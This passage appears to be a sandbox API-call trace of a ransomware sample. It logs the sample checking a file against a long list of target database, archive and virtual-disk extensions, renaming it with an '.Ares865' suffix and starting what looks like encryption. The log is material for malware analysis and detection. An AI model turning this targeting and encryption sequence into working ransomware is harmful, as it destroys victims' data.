Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 82 [0085.282] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile37.bmp" | out: lpString1="usertile37.bmp") returned="usertile37.bmp" [0085.282] lstrlenW (lpString="usertile37.bmp") returned 14 [0085.282] lstrlenW (lpString="Ares865") returned 7 [0085.282] lstrcmpiW (lpString1="e37.bmp", lpString2="Ares865") returned 1 [0085.282] lstrlenW (lpString=".dll") returned 4 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".dll") returned 1 [0085.282] lstrlenW (lpString=".lnk") returned 4 [0085.283] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".lnk") returned 1 [0085.283] lstrlenW (lpString=".ini") returned 4 [0085.283] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".ini") returned 1 [0085.283] lstrlenW (lpString=".sys") returned 4 [0085.283] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".sys") returned 1 [0085.283] lstrlenW (lpString="usertile37.bmp") returned 14 [0085.283] lstrlenW (lpString="bak") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.283] lstrlenW (lpString="ba_") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.283] lstrlenW (lpString="dbb") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.283] lstrlenW (lpString="vmdk") returned 4 [0085.283] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.283] lstrlenW (lpString="rar") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.283] lstrlenW (lpString="zip") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.283] lstrlenW (lpString="tgz") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.283] lstrlenW (lpString="vbox") returned 4 [0085.283] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.283] lstrlenW (lpString="vdi") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.283] lstrlenW (lpString="vhd") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.283] lstrlenW (lpString="vhdx") returned 4 [0085.283] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.283] lstrlenW (lpString="avhd") returned 4 [0085.283] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.283] lstrlenW (lpString="db") returned 2 [0085.283] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.283] lstrlenW (lpString="db2") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.283] lstrlenW (lpString="db3") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.283] lstrlenW (lpString="dbf") returned 3 [0085.283] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.284] lstrlenW (lpString="mdf") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.284] lstrlenW (lpString="mdb") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.284] lstrlenW (lpString="sql") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.284] lstrlenW (lpString="sqlite") returned 6 [0085.284] lstrcmpiW (lpString1="37.bmp", lpString2="sqlite") returned -1 [0085.284] lstrlenW (lpString="sqlite3") returned 7 [0085.284] lstrcmpiW (lpString1="e37.bmp", lpString2="sqlite3") returned -1 [0085.284] lstrlenW (lpString="sqlitedb") returned 8 [0085.284] lstrcmpiW (lpString1="le37.bmp", lpString2="sqlitedb") returned -1 [0085.284] lstrlenW (lpString="xml") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.284] lstrlenW (lpString="$er") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.284] lstrlenW (lpString="4dd") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.284] lstrlenW (lpString="4dl") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.284] lstrlenW (lpString="^^^") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.284] lstrlenW (lpString="abs") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.284] lstrlenW (lpString="abx") returned 3 [0085.284] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.284] lstrlenW (lpString="accdb") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accdb") returned -1 [0085.284] lstrlenW (lpString="accdc") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accdc") returned -1 [0085.284] lstrlenW (lpString="accde") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accde") returned -1 [0085.284] lstrlenW (lpString="accdr") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accdr") returned -1 [0085.284] lstrlenW (lpString="accdt") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accdt") returned -1 [0085.284] lstrlenW (lpString="accdw") returned 5 [0085.284] lstrcmpiW (lpString1="7.bmp", lpString2="accdw") returned -1 [0085.285] lstrlenW (lpString="accft") returned 5 [0085.285] lstrcmpiW (lpString1="7.bmp", lpString2="accft") returned -1 [0085.285] lstrlenW (lpString="adb") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.285] lstrlenW (lpString="adb") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.285] lstrlenW (lpString="ade") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.285] lstrlenW (lpString="adf") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.285] lstrlenW (lpString="adn") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.285] lstrlenW (lpString="adp") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.285] lstrlenW (lpString="alf") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.285] lstrlenW (lpString="ask") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.285] lstrlenW (lpString="btr") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.285] lstrlenW (lpString="cat") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.285] lstrlenW (lpString="cdb") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.285] lstrlenW (lpString="ckp") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.285] lstrlenW (lpString="cma") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.285] lstrlenW (lpString="cpd") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.285] lstrlenW (lpString="dacpac") returned 6 [0085.285] lstrcmpiW (lpString1="37.bmp", lpString2="dacpac") returned -1 [0085.285] lstrlenW (lpString="dad") returned 3 [0085.285] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.285] lstrlenW (lpString="dadiagrams") returned 10 [0085.285] lstrcmpiW (lpString1="tile37.bmp", lpString2="dadiagrams") returned 1 [0085.285] lstrlenW (lpString="daschema") returned 8 [0085.285] lstrcmpiW (lpString1="le37.bmp", lpString2="daschema") returned 1 [0085.286] lstrlenW (lpString="db-journal") returned 10 [0085.286] lstrcmpiW (lpString1="tile37.bmp", lpString2="db-journal") returned 1 [0085.286] lstrlenW (lpString="db-shm") returned 6 [0085.286] lstrcmpiW (lpString1="37.bmp", lpString2="db-shm") returned -1 [0085.286] lstrlenW (lpString="db-wal") returned 6 [0085.286] lstrcmpiW (lpString1="37.bmp", lpString2="db-wal") returned -1 [0085.286] lstrlenW (lpString="dbc") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.286] lstrlenW (lpString="dbs") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.286] lstrlenW (lpString="dbt") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.286] lstrlenW (lpString="dbv") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.286] lstrlenW (lpString="dbx") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.286] lstrlenW (lpString="dcb") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.286] lstrlenW (lpString="dct") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.286] lstrlenW (lpString="dcx") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.286] lstrlenW (lpString="ddl") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.286] lstrlenW (lpString="dlis") returned 4 [0085.286] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.286] lstrlenW (lpString="dp1") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.286] lstrlenW (lpString="dqy") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.286] lstrlenW (lpString="dsk") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.286] lstrlenW (lpString="dsn") returned 3 [0085.286] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.286] lstrlenW (lpString="dtsx") returned 4 [0085.286] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.286] lstrlenW (lpString="dxl") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.287] lstrlenW (lpString="eco") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.287] lstrlenW (lpString="ecx") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.287] lstrlenW (lpString="edb") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.287] lstrlenW (lpString="epim") returned 4 [0085.287] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.287] lstrlenW (lpString="fcd") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.287] lstrlenW (lpString="fdb") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.287] lstrlenW (lpString="fic") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.287] lstrlenW (lpString="flexolibrary") returned 12 [0085.287] lstrcmpiW (lpString1="ertile37.bmp", lpString2="flexolibrary") returned -1 [0085.287] lstrlenW (lpString="fm5") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.287] lstrlenW (lpString="fmp") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.287] lstrlenW (lpString="fmp12") returned 5 [0085.287] lstrcmpiW (lpString1="7.bmp", lpString2="fmp12") returned -1 [0085.287] lstrlenW (lpString="fmpsl") returned 5 [0085.287] lstrcmpiW (lpString1="7.bmp", lpString2="fmpsl") returned -1 [0085.287] lstrlenW (lpString="fol") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.287] lstrlenW (lpString="fp3") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.287] lstrlenW (lpString="fp4") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.287] lstrlenW (lpString="fp5") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.287] lstrlenW (lpString="fp7") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.287] lstrlenW (lpString="fpt") returned 3 [0085.287] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.287] lstrlenW (lpString="frm") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.288] lstrlenW (lpString="gdb") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.288] lstrlenW (lpString="gdb") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.288] lstrlenW (lpString="grdb") returned 4 [0085.288] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.288] lstrlenW (lpString="gwi") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.288] lstrlenW (lpString="hdb") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.288] lstrlenW (lpString="his") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.288] lstrlenW (lpString="ib") returned 2 [0085.288] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.288] lstrlenW (lpString="idb") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.288] lstrlenW (lpString="ihx") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.288] lstrlenW (lpString="itdb") returned 4 [0085.288] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.288] lstrlenW (lpString="itw") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.288] lstrlenW (lpString="jet") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.288] lstrlenW (lpString="jtx") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.288] lstrlenW (lpString="kdb") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.288] lstrlenW (lpString="kexi") returned 4 [0085.288] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.288] lstrlenW (lpString="kexic") returned 5 [0085.288] lstrcmpiW (lpString1="7.bmp", lpString2="kexic") returned -1 [0085.288] lstrlenW (lpString="kexis") returned 5 [0085.288] lstrcmpiW (lpString1="7.bmp", lpString2="kexis") returned -1 [0085.288] lstrlenW (lpString="lgc") returned 3 [0085.288] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.288] lstrlenW (lpString="lwx") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.289] lstrlenW (lpString="maf") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.289] lstrlenW (lpString="maq") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.289] lstrlenW (lpString="mar") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.289] lstrlenW (lpString="marshal") returned 7 [0085.289] lstrcmpiW (lpString1="e37.bmp", lpString2="marshal") returned -1 [0085.289] lstrlenW (lpString="mas") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.289] lstrlenW (lpString="mav") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.289] lstrlenW (lpString="maw") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.289] lstrlenW (lpString="mdbhtml") returned 7 [0085.289] lstrcmpiW (lpString1="e37.bmp", lpString2="mdbhtml") returned -1 [0085.289] lstrlenW (lpString="mdn") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.289] lstrlenW (lpString="mdt") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.289] lstrlenW (lpString="mfd") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.289] lstrlenW (lpString="mpd") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.289] lstrlenW (lpString="mrg") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.289] lstrlenW (lpString="mud") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.289] lstrlenW (lpString="mwb") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.289] lstrlenW (lpString="myd") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.289] lstrlenW (lpString="ndf") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.289] lstrlenW (lpString="nnt") returned 3 [0085.289] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.289] lstrlenW (lpString="nrmlib") returned 6 [0085.290] lstrcmpiW (lpString1="37.bmp", lpString2="nrmlib") returned -1 [0085.290] lstrlenW (lpString="ns2") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.290] lstrlenW (lpString="ns3") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.290] lstrlenW (lpString="ns4") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.290] lstrlenW (lpString="nsf") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.290] lstrlenW (lpString="nv") returned 2 [0085.290] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.290] lstrlenW (lpString="nv2") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.290] lstrlenW (lpString="nwdb") returned 4 [0085.290] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.290] lstrlenW (lpString="nyf") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.290] lstrlenW (lpString="odb") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.290] lstrlenW (lpString="odb") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.290] lstrlenW (lpString="oqy") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.290] lstrlenW (lpString="ora") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.290] lstrlenW (lpString="orx") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.290] lstrlenW (lpString="owc") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.290] lstrlenW (lpString="p96") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.290] lstrlenW (lpString="p97") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.290] lstrlenW (lpString="pan") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.290] lstrlenW (lpString="pdb") returned 3 [0085.290] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.290] lstrlenW (lpString="pdm") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.291] lstrlenW (lpString="pnz") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.291] lstrlenW (lpString="qry") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.291] lstrlenW (lpString="qvd") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.291] lstrlenW (lpString="rbf") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.291] lstrlenW (lpString="rctd") returned 4 [0085.291] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.291] lstrlenW (lpString="rod") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.291] lstrlenW (lpString="rodx") returned 4 [0085.291] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.291] lstrlenW (lpString="rpd") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.291] lstrlenW (lpString="rsd") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.291] lstrlenW (lpString="sas7bdat") returned 8 [0085.291] lstrcmpiW (lpString1="le37.bmp", lpString2="sas7bdat") returned -1 [0085.291] lstrlenW (lpString="sbf") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.291] lstrlenW (lpString="scx") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.291] lstrlenW (lpString="sdb") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.291] lstrlenW (lpString="sdc") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.291] lstrlenW (lpString="sdf") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.291] lstrlenW (lpString="sis") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.291] lstrlenW (lpString="spq") returned 3 [0085.291] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.291] lstrlenW (lpString="te") returned 2 [0085.291] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.291] lstrlenW (lpString="teacher") returned 7 [0085.292] lstrcmpiW (lpString1="e37.bmp", lpString2="teacher") returned -1 [0085.292] lstrlenW (lpString="tmd") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.292] lstrlenW (lpString="tps") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.292] lstrlenW (lpString="trc") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.292] lstrlenW (lpString="trc") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.292] lstrlenW (lpString="trm") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.292] lstrlenW (lpString="udb") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.292] lstrlenW (lpString="udl") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.292] lstrlenW (lpString="usr") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.292] lstrlenW (lpString="v12") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.292] lstrlenW (lpString="vis") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.292] lstrlenW (lpString="vpd") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.292] lstrlenW (lpString="vvv") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.292] lstrlenW (lpString="wdb") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.292] lstrlenW (lpString="wmdb") returned 4 [0085.292] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.292] lstrlenW (lpString="wrk") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.292] lstrlenW (lpString="xdb") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.292] lstrlenW (lpString="xld") returned 3 [0085.292] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.292] lstrlenW (lpString="xmlff") returned 5 [0085.292] lstrcmpiW (lpString1="7.bmp", lpString2="xmlff") returned -1 [0085.292] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.Ares865") returned 90 [0085.293] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.ares865"), dwFlags=0x1) returned 1 [0085.293] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.294] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.295] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.295] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.295] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.297] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.299] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.300] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.300] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.301] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.301] CloseHandle (hObject=0x15c) returned 1 [0085.301] CloseHandle (hObject=0x118) returned 1 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.302] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, 